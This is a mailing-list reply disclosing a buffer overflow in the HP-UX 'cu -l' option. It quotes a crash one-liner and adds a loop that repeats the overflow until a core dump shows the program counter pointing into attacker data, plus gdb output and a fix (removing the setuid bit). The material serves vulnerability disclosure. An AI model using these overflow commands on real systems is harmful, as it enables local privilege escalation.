[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: HPUX cu -l option buffer overflow vulnerabilit
>
> =======================================================
> HPUX cu -l option buffer overflow vulnerability
> =======================================================
>
> Date: 02/11/2000
> Tested on HP-UX B.11.00
>
> $ cu -l `perl -e 'printf "A" x 9777'`
>
It's exploitable on 10.20 (trivial exploit: you don't even
have to find return address, the buffer itself gets executed)
HP-UX 9.x 68k seems to be vulnerable too, but I don't have
the exploit.
On HP-UX 11 you need PA-RISC 1.1 shell code, and the PC
you get with
./cu -l `perl -e 'printf "A" x 5667'`
changes randomly (why?). Eventually you get a pointer to your
data:
$ while :
do
./cu -l `perl -e 'printf "A" x 5667'`
if file core | egrep -v SIGILL
then
break
fi
done
[...]
Illegal instruction(coredump)
Connect failed: Requested device/system name not known
Illegal instruction(coredump)
Memory fault(coredump)
core: core file from 'cu' - received SIGSEGV
$ gdb cu core
[...]
Core was generated by `cu'.
Program terminated with signal 11, Segmentation fault.
Unable to find __dld_flags symbol in object file.
#0 0x7f7eb010 in ?? ()
#0 0x7f7eb010 in ?? ()
(gdb) print {char *} 0x7f7eb010
$1 = 0x41414141 <Address 0x41414141 out of bounds>
(gdb)
Fix: chmod -s /bin/cu
--
finger spd@gtc1.cps.unizar.es for PGP / So be easy and free
.mailcap tip of the day: / when you're drinking with me
application/ms-tnef; cat '%s' > /dev/null / I'm a man you don't meet every day
text/x-vcard; cat '%s' > /dev/null / (the pogues)
|
